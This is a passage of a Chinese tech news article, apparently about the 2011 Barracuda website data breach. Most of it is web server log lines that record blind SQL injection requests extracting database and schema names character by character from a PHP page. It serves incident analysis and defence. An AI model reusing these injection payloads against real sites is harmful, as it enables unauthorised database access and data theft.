扫一扫
分享文章到微信
扫一扫
关注官方公众号
至顶头条
在本页阅读全文(共3页)
数据泄露事件具体过程
通过梭子鱼Web应用防火墙的日志,我们确认非法用户使用了两个客户端对网站进行探测和攻击:
使用梭子鱼Web应用防火墙报告的信息,我们能够迅速在Web服务器日志上过滤并查找到相应的记录条目。
2011-04-10 03:19:17 GET /ns/customers/customer_verticals.php v=12”%20and%20ascii(substring((database()),13,1))=99%20and%20”x”=”x 80 - 87.1
2011-04-10 03:19:17 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%
2011-04-10 03:19:18 GET /ns/customers/customer_verticals.php v=12”%20and%20ascii(substring((database()),13,1))=98%20and%20”x”=”x 80 - 87.1
2011-04-10 03:19:18 GET /ns/customers/customer_verticals.php v=12”%20and%20ascii(substring((database()),13,1))=97%20and%20”x”=”x 80 - 87.1
2011-04-10 03:19:19 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%
2011-04-10 03:19:21 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%
2011-04-10 03:19:24 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%
2011-04-10 03:19:26 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%
2011-04-10 03:19:28 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%
2011-04-10 03:19:31 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%
2011-04-10 03:19:32 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%
2011-04-10 03:19:33 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%
2011-04-10 03:19:37 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%
2011-04-10 03:19:39 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%
2011-04-10 03:19:41 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%
2011-04-10 03:19:46 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%
2011-04-10 03:19:48 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%
2011-04-10 03:19:48 GET /ns/customers/customer_verticals.php v=12”%20and%20Length((SELECT%20distinct%20schema_name%20from%20info
2011-04-10 03:19:49 GET /ns/customers/customer_verticals.php v=12”%20and%20Length((SELECT%20distinct%20schema_name%20from%20info
2011-04-10 03:19:51 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%
2011-04-10 03:19:51 GET /ns/customers/customer_verticals.php v=12”%20and%20Length((SELECT%20distinct%20schema_name%20from%20info
2011-04-10 03:19:52 GET /ns/customers/customer_verticals.php v=12”%20and%20Length((SELECT%20distinct%20schema_name%20from%20info
2011-04-10 03:19:53 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%
2011-04-10 03:19:53 GET /ns/customers/customer_verticals.php v=12”%20and%20Length((SELECT%20distinct%20schema_name%20from%20info
2011-04-10 03:19:54 GET /ns/customers/customer_verticals.php v=12”%20and%20Length((SELECT%20distinct%20schema_name%20from%20info
2011-04-10 03:19:54 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%
2011-04-10 03:19:54 GET /ns/customers/customer_verticals.php v=12”%20and%20Length((SELECT%20distinct%20schema_name%20from%20info
2011-04-10 03:19:55 GET /ns/customers/customer_verticals.php v=12”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%
2011-04-10 03:19:57 GET /ns/customers/customer_verticals.php v=12”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%
2011-04-10 03:19:57 GET /ns/customers/customer_verticals.php v=11”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%
2011-04-10 03:19:57 GET /ns/customers/customer_verticals.php v=12”%20and%20ascii(substring((SELECT%20distinct%20schema_name%20from%
注:Web 日志使用的是格林威治标准时间(GMT),而 Web 应用防火墙使用的是太平洋夏令时(PDT)
通过仔细查看梭子鱼Web 应用防火墙的每个日志条目,我们找到了攻击者及其所用工具的线索:
如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。
现场直击|2021世界人工智能大会
直击5G创新地带,就在2021MWC上海
5G已至 转型当时——服务提供商如何把握转型的绝佳时机
寻找自己的Flag
华为开发者大会2020(Cloud)- 科技行者